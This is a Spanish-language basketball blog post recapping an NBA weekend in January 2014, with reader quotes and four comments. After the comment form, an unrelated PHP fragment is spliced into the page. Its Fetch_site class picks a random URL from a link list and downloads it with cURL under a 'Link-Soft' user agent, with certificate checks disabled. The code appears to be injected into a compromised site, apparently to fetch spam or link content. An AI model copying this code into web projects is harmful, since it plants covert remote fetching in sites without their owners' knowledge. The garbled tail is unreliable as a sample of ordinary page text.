Informe del fin de semana: No hubo revancha

27 de January de 2014 por TheDeerHunter

Volvió Wade y los campeones volvían a tocarle la cara a los Spurs anoche con relativa facilidad y Bosh como máximo exponente. Pero antes…

“Bueno, pues Melo creo que se va a quedar en 62 puntos, 13 rebotes y 23-35 en TC, 6 triples, uno de ellos desde el centro del campo.” Denise

El viernes fue la noche de Carmelo Anthony. No sólo podemos hablar de una serie de récords, personales y de la franquicia, sinó también de que la victoria era vital para que los Knicks puedan engancharse otra vez a la carrera por la postemporada. Los Bobcats parecen perder comba en la octava plaza del Este y los Pistons no ganan desde hace mucho. El viernes, los de Detroit volvían a perder, esta vez contra Pelicans con clutch de Eric Gordon a falta de 1.9 seg. Con todo lo que ha llovido, la zona de playoffs queda para los Knicks a tan sólo dos victorias de distancia.

No iba a ser la única exhibición de la noche, ni tampoco del fin de semana.

“Pues al final 42 puntos para Marcus y 38 para I.Thomas, eso si 27 tiros para el primero y 31 tiros para el “base””. Ruxixon.

Increíble el “renacimiento” de Marcus Thorton en los Kings ante los líderes de la liga. Lo más alucinante es que no iba a servir para ganar. Se equivocaba Isaiah Thomas en los instantes finales de la prórroga al absorver demasiado juego, con nuestro Sancho jurándole odio eterno.

Veíamos, además, otro bonito duelo en La Bahía. Los Wolves ganaban su primer partido igualado y lo venían a hacer frente a un equipo que en demasiadas ocasiones se complica la vida.

“Vaya telita lo de Harrison Barnes. Caso para el psicólogo. El tío se marca un 1-7 y la intrascendencia habitual de este curso. Curry le deja absolutamente solo en la línea de 3 para ganar el partido ante los Wolves y falla, algo que puede ocurrir pero que el año pasado seguramente hubiera caído dentro. ¿Qué le pasa a este muchacho, con lo que demostró el curso pasado?” Luis H.

Comentábais también la tendencia de Stephen Curry a perder balones decisivos. Por ‘h’, por ‘b’ o por ‘c’ ninguno de los dos equipos termina de consolidar su juego. 

El viernes también asistimos a un triple doble de Lowry en Philadelphia; a el palizón de los Spurs a Atlanta a domicilio, aunque Kyle Korver sigue sumando triples (111 partidos consecutivos ya con al menos un triple); a la victoria de los Thunder en Boston reservando a Durant; a la extraordinaria actuación de Mirza Teletovic ante Dallas; a las victorias de los Clippers en Chicago y de Memphis en Houston; al importantísimo triunfo de Wizards en Phoenix; a los 28 puntos, 20 rebotes de Tobias Harris ante Lakers, y, cómo no, a la derrota de Milwaukee en Cleveland.

El sábado…

“Continúa el fin de semana de actuaciones individuales estelares, esta vez le ha tocado a Terrence Ross, ¡51 puntos! Eso si, no le ha servido para conseguir la victoria ante los Clippers.” Schize

No hablaremos del partidazo de Blake Griffin, que también, sinó de los 37 de Jamal Crawford, del que en demasiadas ocasiones casi nos olvidamos.

La figura de la noche, sin embargo volvía a ser Kevin Durant, que se marcó otra actuación por encima de los 30 puntos (empatando el récord de las últimas 10 campañas) pero con un triple doble de regalo. Los pobres Sixers bastante hicieron dando la cara.

Y ojo… “Del fin de semana me quedo con los Grizzlies. En 87 y 81 puntos han dejado a los Rockets en el back to back (5º mejor ataque de la liga). Se ha visto bastante de la defensa del año pasado y eso que no parece que Marc esté aún al 100%. Y puede ser interesante lo de Courtney Lee. De momento lo está metiendo todo, y sin esperar que siga así es un tío que no les va a comprometer defensivamente y que en momentos que haya que meterla desde fuera puede ser mucho más válido que Tony Allen. 8-2 en los últimos 10 partidos y con la mirada puesta en la octava plaza.” Rumbero

Ya están aquí. Con muchas dudas desde Houston para abajo. Vuelvo a insistir que en una hipotética primera ronda muchos preferirían cruzarse con muchos equipos que les anteceden que con los Grizzlies que ni siquiera están clasificados todavía. Terrorífico panorama en el Oeste.

Por si faltaba algo, los Nuggets mostraron nuevamente su potencial doblegando a Indiana. Eso sí, los Wolves continúan con su maldición de no mantenerse demasiado tiempo en el 50% de victorias, en esta ocasión con una comprensible derrota en Portland.

Además, Chicago ganó en Charlotte en un momento impresionante de DJ Augustine; Atlanta ganó en Milwaukee, y los Wizards también consolidaron su maldición particular del 50%. Ellos perdiendo en Salt Lake City.

Finalmente anoche, y como adelantábamos, unos Spurs con varias bajas importantes perdieron en Miami; los Warriors destrozaron a los Blazers con partidón del Artista; Anthony Davis destrozó a Orlando y Dirk Nowitzki a los Pistons; Ty Lawson se exhibió en Sacramento y Markieff Morris en Cleveland mientras que Melo “se quedó” en 35 puntos frente los Lakers.

Y en la vuelta de Kevin Garnett y Paul Pierce al Garden, emotivo homenaje de de los seguidores de los Celtics, agradecidos eternamente. Eso sí, una vez en el partido, nada de sentimentalismos. Victoria de unos Nets que siguen con su remontada.

Esto es todo, señores.

Comenta

4 comentarios a esta entrada

  1. Esteban dice:
    #1

    Davis 22 puntos, 19 rebotes, 7 bloqueos, 2 recuperos y 3 asistencias

    algo mas?

      Citar

  2. charnes dice:
    #2

    Algo más? Bueno, el nivel altísimo de Griffin, tras la lesión de Paul y durante toda la temporada en general, creo que también es digno de elogio. Ha dado ese pasito al frente que se le exigía…Crawford genial por cierto en estos momentos que más le necesitan. Los playoff del oeste van a dar miedo.

      Citar

  3. Esteban dice:
    #3

    Griffin mejor de lo eperado es cierto, pero otro q ha dado un paso al frente como dices es crawford, sin cpt debe estar en 24 ppp

      Citar

  4. Esteban dice:
    #4

    Y pensando en ello la compeencia por el sexto hombre este año esta bastante floja,con anrderson de titular, crwaford es claro candidato

    Evans lo esta haciendo genial tambn, pero un escalon por debajo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>